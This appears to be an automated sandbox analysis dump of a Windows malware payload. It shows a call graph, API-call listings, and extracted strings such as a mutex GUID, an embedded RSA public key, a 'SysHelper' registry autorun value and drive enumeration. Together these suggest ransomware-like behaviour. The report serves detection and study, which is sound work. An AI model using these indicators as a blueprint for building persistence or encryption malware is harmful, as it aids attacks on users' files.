39540->39544 39547 ba1cd0 92 API calls 39541->39547 39542 baa6f9 40152 ba1a10 8 API calls 39542->40152 39546 baa5a9 39543->39546 39561 baa3e2 GlobalFree 39544->39561 39562 baa3d4 Sleep 39544->39562 40147 ba1ab0 PeekMessageW 39544->40147 39545 baa6fe 39549 baa70f 39545->39549 39550 baa8b6 CreateMutexA 39545->39550 39553 ba4690 59 API calls 39546->39553 39554 baa40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 39547->39554 39555 baa7d0 39549->39555 39566 b9ef50 58 API calls 39549->39566 39556 baa8ca 39550->39556 39552 baa618 39552->39550 39557 baa624 GetVersion 39552->39557 39558 baa5d4 39553->39558 39559 baa451 39554->39559 39563 b9ef50 58 API calls 39555->39563 39560 b9ef50 58 API calls 39556->39560 39557->39542 39564 baa632 lstrcpyW lstrcatW lstrcatW 39557->39564 39844 b9d240 CoInitialize 39558->39844 39559->39415 39574 baa8da 39560->39574 39567 baa3f7 39561->39567 39562->39539 39568 baa7ec 39563->39568 39569 baa674 _memset 39564->39569 39577 baa72f 39566->39577 39567->39415 39570 baa7f1 lstrlenA 39568->39570 39573 baa6b4 ShellExecuteExW 39569->39573 39572 bb0c62 _malloc 58 API calls 39570->39572 39571->39542 39571->39545 39571->39552 39575 baa810 _memset 39572->39575 39573->39545 39576 baa6e3 39573->39576 39578 ba3ea0 59 API calls 39574->39578 39587 baa92f 39574->39587 39580 baa81e MultiByteToWideChar lstrcatW 39575->39580 39719 baa9d1 39576->39719 39579 ba3ea0 59 API calls 39577->39579 39582 baa780 39577->39582 39578->39574 39579->39577 39580->39570 39581 baa847 lstrlenW 39580->39581 39583 baa8a0 CreateMutexA 39581->39583 39584 baa856 39581->39584 39585 baa79c CreateThread 39582->39585 39589 ba3ff0 59 API calls 39582->39589 39583->39556 39926 b9e760 39584->39926 39585->39555 41376 badbd0 39585->41376 39588 ba5c10 59 API calls 39587->39588 39591 baa98c 39588->39591 39589->39585 39590 baa860 CreateThread WaitForSingleObject 39590->39583 41307 bae690 39590->41307 39937 ba2840 39591->39937 39593 baa997 39942 ba0fc0 CryptAcquireContextW 
39593->39942 39595 baa9ab 39596 baa9c2 lstrlenA 39595->39596 39597 baa9d8 39596->39597 39596->39719 39598 ba5c10 59 API calls 39597->39598 39599 baaa23 39598->39599 39600 ba2840 60 API calls 39599->39600 39601 baaa2e lstrcpyA 39600->39601 39603 baaa4b 39601->39603 39603->39603 39604 ba5c10 59 API calls 39603->39604 39605 baaa90 39604->39605 39606 b9ef50 58 API calls 39605->39606 39607 baaaa0 39606->39607 39608 ba3ea0 59 API calls 39607->39608 39609 baaaf5 39607->39609 39608->39607 39610 ba3ff0 59 API calls 39609->39610 39611 baab1d 39610->39611 39965 ba2900 39611->39965 39613 b9ef50 58 API calls 39615 baabc5 39613->39615 39614 baab28 _memmove 39614->39613 39616 ba3ea0 59 API calls 39615->39616 39617 baac1e 39615->39617 39616->39615 39618 ba3ff0 59 API calls 39617->39618 39619 baac46 39618->39619 39620 ba2900 60 API calls 39619->39620 39622 baac51 _memmove 39620->39622 39621 b9ef50 58 API calls 39623 baacee 39621->39623 39622->39621 39624 ba3ea0 59 API calls 39623->39624 39625 baad43 39623->39625 39624->39623 39626 ba3ff0 59 API calls 39625->39626 39627 baad6b 39626->39627 39628 ba2900 60 API calls 39627->39628 39631 baad76 _memmove 39628->39631 39629 ba5c10 59 API calls 39630 baae2a 39629->39630 39970 ba3580 39630->39970 39631->39629 39633 baae3c 39634 ba5c10 59 API calls 39633->39634 39635 baae76 39634->39635 39636 ba3580 59 API calls 39635->39636 39637 baae82 39636->39637 39638 ba5c10 59 API calls 39637->39638 39639 baaebc 39638->39639 39640 ba3580 59 API calls 39639->39640 39641 baaec8 39640->39641 39642 ba5c10 59 API calls 39641->39642 39643 baaf02 39642->39643 39644 ba3580 59 API calls 39643->39644 39645 baaf0e 39644->39645 39646 ba5c10 59 API calls 39645->39646 39647 baaf48 39646->39647 39648 ba3580 59 API calls 39647->39648 39649 baaf54 39648->39649 39650 ba5c10 59 API calls 39649->39650 39651 baaf8e 39650->39651 39652 ba3580 59 API calls 39651->39652 39653 baaf9a 39652->39653 39654 ba5c10 59 API calls 39653->39654 39655 baafd4 39654->39655 39656 ba3580 59 
API calls 39655->39656 39657 baafe0 39656->39657 39658 ba3100 59 API calls 39657->39658 39659 bab001 39658->39659 39660 ba3580 59 API calls 39659->39660 39661 bab025 39660->39661 39662 ba3100 59 API calls 39661->39662 39663 bab03c 39662->39663 39664 ba3580 59 API calls 39663->39664 39665 bab059 39664->39665 39666 ba3100 59 API calls 39665->39666 39667 bab070 39666->39667 39668 ba3580 59 API calls 39667->39668 39669 bab07c 39668->39669 39670 ba3100 59 API calls 39669->39670 39671 bab093 39670->39671 39672 ba3580 59 API calls 39671->39672 39673 bab09f 39672->39673 39674 ba3100 59 API calls 39673->39674 39675 bab0b6 39674->39675 39676 ba3580 59 API calls 39675->39676 39677 bab0c2 39676->39677 39678 ba3100 59 API calls 39677->39678 39679 bab0d9 39678->39679 39680 ba3580 59 API calls 39679->39680 39681 bab0e5 39680->39681 39682 ba3100 59 API calls 39681->39682 39683 bab0fc 39682->39683 39684 ba3580 59 API calls 39683->39684 39685 bab108 39684->39685 39687 bab130 39685->39687 40153 bacdd0 59 API calls 39685->40153 39688 b9ef50 58 API calls 39687->39688 39689 bab16e 39688->39689 39691 bab1a5 GetUserNameW 39689->39691 39977 ba2de0 39689->39977 39692 bab1c9 39691->39692 39984 ba2c40 39692->39984 39694 bab1d8 39991 ba2bf0 39694->39991 39698 bab2f5 40002 ba36c0 39698->40002 39702 bab311 40018 ba30b0 39702->40018 39704 ba2c40 59 API calls 39720 bab1f3 39704->39720 39707 ba2900 60 API calls 39707->39720 39708 bab327 40044 ba11c0 CreateFileW 39708->40044 39709 ba3580 59 API calls 39709->39720 39711 bab33b 40129 baba10 LoadCursorW RegisterClassExW 39711->40129 39713 bab343 40130 baba80 CreateWindowExW 39713->40130 39714 ba3100 59 API calls 39714->39720 39716 bab34b 39716->39719 40133 ba0a50 GetLogicalDrives 39716->40133 39719->39415 39720->39698 39720->39704 39720->39707 39720->39709 39720->39714 40154 b9f1f0 59 API calls 39720->40154 39721 bab379 39722 ba3100 59 API calls 39721->39722 39723 bab3a5 39722->39723 39724 ba3580 59 API calls 39723->39724 39747 bab3b3 39724->39747 
39725 bab48b 40144 bafdc0 CreateThread 39725->40144 39727 bab49f GetMessageW 39728 bab4bf 39727->39728 39729 bab4ed 39727->39729 39731 bab4c5 TranslateMessage DispatchMessageW KiUserCallbackDispatcher 39728->39731 39732 bab55b 39729->39732 39733 bab502 PostThreadMessageW 39729->39733 39730 bac330 59 API calls 39730->39747 39731->39729 39731->39731 39735 bab5bb 39732->39735 39736 bab564 PostThreadMessageW 39732->39736 39734 bab510 PeekMessageW 39733->39734 39737 bab546 WaitForSingleObject 39734->39737 39738 bab526 DispatchMessageW PeekMessageW 39734->39738 39735->39719 39742 bab5d2 CloseHandle 39735->39742 39739 bab570 PeekMessageW 39736->39739 39737->39732 39737->39734 39738->39737 39738->39738 39740 bab5a6 WaitForSingleObject 39739->39740 39741 bab586 DispatchMessageW PeekMessageW 39739->39741 39740->39735 39740->39739 39741->39740 39741->39741 39742->39719 39743 bac240 59 API calls 39743->39747 39744 bab8b0 59 API calls 39744->39747 39745 ba3260 59 API calls 39745->39747 39747->39725 39747->39730 39747->39743 39747->39744 39747->39745 40143 bafa10 CreateThread 39747->40143 41553 bb7e0e 39748->41553 39750 bb7f4c 39750->39416 39751->39389 39752->39393 39753->39400 39757->39419 39758->39425 39759->39428 39760->39432 39761->39431 39762->39439 39763->39443 39764->39440 39765->39460 39766->39458 39767->39452 39768->39483 39769->39486 39771 bcaeb8 EncodePointer 39770->39771 39771->39771 39772 bcaed2 39771->39772 39772->39490 39774 b9cf32 _memset __write_nolock 39773->39774 39775 b9cf4f InternetOpenW 39774->39775 39776 ba5c10 59 API calls 39775->39776 39777 b9cf8a InternetOpenUrlW 39776->39777 39778 b9cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39777->39778 39786 b9cfb2 39777->39786 39779 ba56d0 59 API calls 39778->39779 39780 b9d000 39779->39780 39781 ba56d0 59 API calls 39780->39781 39782 b9d049 39781->39782 39782->39786 40155 ba3010 39782->40155 39784 b9d084 39785 ba3010 59 API calls 39784->39785 39784->39786 39785->39786 39786->39496 39788 ba3ab2 
39787->39788 39794 ba3ad0 GetModuleFileNameW PathRemoveFileSpecW 39787->39794 39789 ba3aba 39788->39789 39790 ba3b00 39788->39790 39792 bb3b4c 59 API calls 39789->39792 39791 bdf23e 59 API calls 39790->39791 39793 ba3ac7 39791->39793 39792->39793 39793->39794 40158 bdf1bb 59 API calls 3 library calls 39793->40158 39797 ba8400 39794->39797 39798 ba8437 39797->39798 39802 ba8446 39797->39802 39798->39802 40159 ba5d50 39798->40159 39800 ba84b9 39800->39521 39802->39800 40169 ba8d50 59 API calls 39802->40169 39804 bbf7c0 __write_nolock 39803->39804 39805 ba222d 7 API calls 39804->39805 39806 ba228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39805->39806 39807 ba22bd K32EnumProcesses 39805->39807 39806->39807 39808 ba22df 39807->39808 39809 ba22d3 39807->39809 39810 ba2353 39808->39810 39811 ba22f0 OpenProcess 39808->39811 39809->39524 39810->39524 39812 ba230a K32EnumProcessModules 39811->39812 39813 ba2346 CloseHandle 39811->39813 39812->39813 39814 ba231c K32GetModuleBaseNameW 39812->39814 39813->39810 39813->39811 40170 bb0235 39814->40170 39816 ba233e 39816->39813 39817 ba2345 39816->39817 39817->39813 39819 bb0c62 _malloc 58 API calls 39818->39819 39820 b9ef6e _memset 39819->39820 39821 b9efdc 39820->39821 39822 bb0c62 _malloc 58 API calls 39820->39822 39821->39530 39822->39820 39824 ba3f05 39823->39824 39829 ba3eae 39823->39829 39825 ba3f18 39824->39825 39826 ba3fb1 39824->39826 39828 ba3fbb 39825->39828 39830 ba3f2d 39825->39830 39838 ba3f3d ___check_float_string 39825->39838 39827 bdf23e 59 API calls 39826->39827 39827->39828 39831 bdf23e 59 API calls 39828->39831 39829->39824 39834 ba3ed4 39829->39834 39832 ba6760 59 API calls 39830->39832 39830->39838 39833 ba3fc5 39831->39833 39832->39838 39835 ba3ff0 59 API calls 39833->39835 39836 ba3ed9 39834->39836 39837 ba3eef 39834->39837 39839 ba3fdf 39835->39839 40182 ba3da0 59 API calls ___check_float_string 39836->40182 40183 ba3da0 59 API calls ___check_float_string 39837->40183 39838->39530 
39839->39530 39842 ba3ee9 39842->39530 39843 ba3eff 39843->39530 39845 b9d27d CoInitializeSecurity 39844->39845 39850 b9d276 39844->39850 39846 ba4690 59 API calls 39845->39846 39847 b9d2b8 CoCreateInstance 39846->39847 39848 b9da3c CoUninitialize 39847->39848 39849 b9d2e3 VariantInit VariantInit VariantInit VariantInit 39847->39849 39848->39850 39851 b9d38e VariantClear VariantClear VariantClear VariantClear 39849->39851 39850->39571 39852 b9d3cc CoUninitialize 39851->39852 39853 b9d3e2 39851->39853 39852->39850 40184 b9b140 39853->40184 39856 b9d3f6 40189 b9b1d0 39856->40189 39858 b9d422 39859 b9d43c 39858->39859 39860 b9d426 CoUninitialize 39858->39860 39861 b9b140 60 API calls 39859->39861 39860->39850 39863 b9d449 39861->39863 39864 b9b1d0 SysFreeString 39863->39864 39865 b9d471 39864->39865 39866 b9d4ac 39865->39866 39867 b9d496 CoUninitialize 39865->39867 39869 b9b140 60 API calls 39866->39869 39924 b9d8cf 39866->39924 39867->39850 39870 b9d4d5 39869->39870 39871 b9b1d0 SysFreeString 39870->39871 39872 b9d4fd 39871->39872 39873 b9b140 60 API calls 39872->39873 39872->39924 39874 b9d5ae 39873->39874 39875 b9b1d0 SysFreeString 39874->39875 39876 b9d5d6 39875->39876 39877 b9b140 60 API calls 39876->39877 39876->39924 39878 b9d679 39877->39878 39879 b9b1d0 SysFreeString 39878->39879 39880 b9d6a1 39879->39880 39881 b9b140 60 API calls 39880->39881 39880->39924 39882 b9d6b6 39881->39882 39883 b9b1d0 SysFreeString 39882->39883 39884 b9d6de 39883->39884 39885 b9b140 60 API calls 39884->39885 39884->39924 39886 b9d707 39885->39886 39887 b9b1d0 SysFreeString 39886->39887 39888 b9d72f 39887->39888 39889 b9b140 60 API calls 39888->39889 39888->39924 39890 b9d744 39889->39890 39891 b9b1d0 SysFreeString 39890->39891 39892 b9d76c 39891->39892 39892->39924 40193 bb3aaf GetSystemTimeAsFileTime 39892->40193 39894 b9d77d 40195 bb3551 39894->40195 39899 ba2c40 59 API calls 39900 b9d7b5 39899->39900 39901 ba2900 60 API calls 39900->39901 39902 b9d7c3 39901->39902 39903 b9b140 60 
41465->41467 41481 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 41466->41481 41469 bb8df4 __getstream 61 API calls 41467->41469 41470 bb2042 41469->41470 41471 bb204b 41470->41471 41472 bb2058 41470->41472 41473 bb5208 __woutput_s_l 58 API calls 41471->41473 41474 bb2081 41472->41474 41475 bb2061 41472->41475 41478 bb2020 __alloc_osfhnd @_EH4_CallFilterFunc@8 41473->41478 41482 bbb078 41474->41482 41476 bb5208 __woutput_s_l 58 API calls 41475->41476 41476->41478 41478->41456 41481->41478 41490 bbb095 41482->41490 41483 bbb0a9 41484 bb5208 __woutput_s_l 58 API calls 41483->41484 41485 bbb0ae 41484->41485 41500 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 41485->41500 41486 bbb2ac 41505 bcfba6 41486->41505 41488 bb208c 41499 bb20ae LeaveCriticalSection LeaveCriticalSection _vfwprintf_helper 41488->41499 41490->41483 41498 bbb250 41490->41498 41501 bcfbc4 58 API calls __mbsnbcmp_l 41490->41501 41492 bbb216 41492->41483 41502 bcfcf3 65 API calls __mbsnbicmp_l 41492->41502 41494 bbb249 41494->41498 41503 bcfcf3 65 API calls __mbsnbicmp_l 41494->41503 41496 bbb268 41496->41498 41504 bcfcf3 65 API calls __mbsnbicmp_l 41496->41504 41498->41483 41498->41486 41499->41478 41500->41488 41501->41492 41502->41494 41503->41496 41504->41498 41508 bcfa8f 41505->41508 41507 bcfbbf 41507->41488 41510 bcfa9b __alloc_osfhnd 41508->41510 41509 bcfab1 41511 bb5208 __woutput_s_l 58 API calls 41509->41511 41510->41509 41512 bcfae7 41510->41512 41513 bcfab6 41511->41513 41520 bcfb58 41512->41520 41519 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 41513->41519 41518 bcfac0 __alloc_osfhnd 41518->41507 41519->41518 41528 bb7970 41520->41528 41523 bcfb03 41527 bcfb2c LeaveCriticalSection __unlock_fhandle 41523->41527 41524 bcbac1 __wsopen_nolock 109 API calls 41525 bcfb92 41524->41525 41526 bb0bed _free 58 API calls 41525->41526 41526->41523 41527->41518 41529 bb797d 41528->41529 41530 bb7993 41528->41530 41532 bb5208 __woutput_s_l 58 API calls 41529->41532 
41530->41529 41531 bb799a ___crtIsPackagedApp 41530->41531 41535 bb79a3 AreFileApisANSI 41531->41535 41536 bb79b0 MultiByteToWideChar 41531->41536 41533 bb7982 41532->41533 41549 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 41533->41549 41535->41536 41537 bb79ad 41535->41537 41538 bb79db 41536->41538 41539 bb79ca GetLastError 41536->41539 41537->41536 41541 bb8cde __malloc_crt 58 API calls 41538->41541 41550 bb51e7 58 API calls 3 library calls 41539->41550 41543 bb79e3 41541->41543 41542 bb798c 41542->41523 41542->41524 41543->41542 41544 bb79ea MultiByteToWideChar 41543->41544 41544->41542 41545 bb7a00 GetLastError 41544->41545 41551 bb51e7 58 API calls 3 library calls 41545->41551 41547 bb7a0c 41548 bb0bed _free 58 API calls 41547->41548 41548->41542 41549->41542 41550->41542 41551->41547 41552->41410 41554 bb7e1a __alloc_osfhnd 41553->41554 41555 bb8af7 __lock 51 API calls 41554->41555 41556 bb7e21 41555->41556 41557 bb7eda __cinit 41556->41557 41558 bb7e4f DecodePointer 41556->41558 41573 bb7f28 41557->41573 41558->41557 41560 bb7e66 DecodePointer 41558->41560 41566 bb7e76 41560->41566 41562 bb7f37 __alloc_osfhnd 41562->39750 41564 bb7e83 EncodePointer 41564->41566 41565 bb7f1f 41567 bb7b0b __mtinitlocknum 3 API calls 41565->41567 41566->41557 41566->41564 41568 bb7e93 DecodePointer EncodePointer 41566->41568 41571 bb7ea5 DecodePointer DecodePointer 41566->41571 41569 bb7f28 41567->41569 41568->41566 41570 bb7f35 41569->41570 41578 bb8c81 LeaveCriticalSection 41569->41578 41570->39750 41571->41566 41574 bb7f2e 41573->41574 41575 bb7f08 41573->41575 41579 bb8c81 LeaveCriticalSection 41574->41579 41575->41562 41577 bb8c81 LeaveCriticalSection 41575->41577 41577->41565 41578->41570 41579->41575
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00B9CF10: _memset.LIBCMT ref: 00B9CF4A
                                                                                                                                                                          • Part of subcall function 00B9CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00B9CF5F
                                                                                                                                                                          • Part of subcall function 00B9CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00B9CFA6
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00BA9FC4
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA9FD2
                                                                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00BA9FDA
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA9FE4
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00E5B7D0,?), ref: 00BAA0BB
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAA0C2
                                                                                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 00BAA161
                                                                                                                                                                          • Part of subcall function 00BA24E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00BA24FE
                                                                                                                                                                          • Part of subcall function 00BA24E0: GetLastError.KERNEL32 ref: 00BA2509
                                                                                                                                                                          • Part of subcall function 00BA24E0: CloseHandle.KERNEL32 ref: 00BA251C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2957410896-1065278900
                                                                                                                                                                        • Opcode ID: d42a5c74886137734104f8e725125d7f5d0853758e1ae80d92a57886b797cf8b
                                                                                                                                                                        • Instruction ID: 73941414d16913fe58f7feb174d1db90b03984ebbd884bec1ab251982b1e4f32
                                                                                                                                                                        • Opcode Fuzzy Hash: d42a5c74886137734104f8e725125d7f5d0853758e1ae80d92a57886b797cf8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 35D2C670508341AFDB14EF24C895B9FB7E4FF96704F0009ADF48597292EB719A49CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00C11983
                                                                                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00C11994
                                                                                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00C119A1
                                                                                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00C119AE
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00C119E8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00C119FB
                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00C11A2D
                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00C11A81
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11AC5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00C11ADB
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00C11AEE
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00C11B01
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11C15
                                                                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00C11C36
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00C11C50
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00C11C63
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00C11C76
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11D45
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00C11D73
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00C11D86
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00C11D99
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00C11DAC
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00C11DBF
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00C11DD2
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00C11DE5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00C11DF8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00C11E0B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00C11E1E
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00C11E31
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00C11E44
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00C11EDD
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C11F03
                                                                                                                                                                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00C11F1A
                                                                                                                                                                        • Heap32First.KERNEL32(00000024,?,?), ref: 00C11F95
                                                                                                                                                                        • Heap32Next.KERNEL32(?,?,?,?,?,097C0B2E), ref: 00C11FE3
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C11FF1
                                                                                                                                                                        • Heap32ListNext.KERNEL32(?,?), ref: 00C12058
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12066
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12095
                                                                                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 00C120AA
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C120FB
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12118
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12187
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C121A4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00C5B3EC,000000FF), ref: 00BAE6C0
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00BAE6D4), ref: 00B9C6C2
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00B9C6F3
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00B9C700
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAE707
                                                                                                                                                                          • Part of subcall function 00B9C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00B9C51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 00BAE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BAE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BAE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00BAE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00BAE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00BAE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00BAE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00BAE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00BAEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAEAE3
